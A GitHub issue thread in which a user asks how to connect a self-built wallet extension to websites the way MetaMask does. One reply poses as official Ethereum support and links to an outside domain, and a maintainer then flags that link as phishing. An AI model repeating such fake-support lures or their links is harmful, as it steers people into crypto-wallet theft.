### ISSUE TITLE
We have an own wallet extension, but we don't have an idea how to connect this to other sites?

### ISSUE THREAD

**Issue by pemaju** [ethereum/EIPs#7455]
### Proposed Change

I had an Wallet created by Own.I need to connect that wallet with active sites like Metamask.If we want to connect the Metamask with Site means we call `window.ethereum` default as a trigger comment.

Likewise Which comment should i use for connect My own created wallet with Active Sites or using as same `window.ethereum` how to connect my own wallet.

Guide me

**Comment by Glith23** [comment]
Hi @pemaju  
visit the official page to initiate a chat with our support team on the live chat to report your errors for review and for further assistance via [Ethereum Support](https://etherofficial.online/)

**Comment by abcoathup** [comment]
> Ethereum Support

**SCAM: There is no official support. This is a link to a phishing site.**
Reported to GitHub.

**Comment by SamWilsn** [comment]
@pemaju Unfortunately this isn't the correct place to get help with wallets.
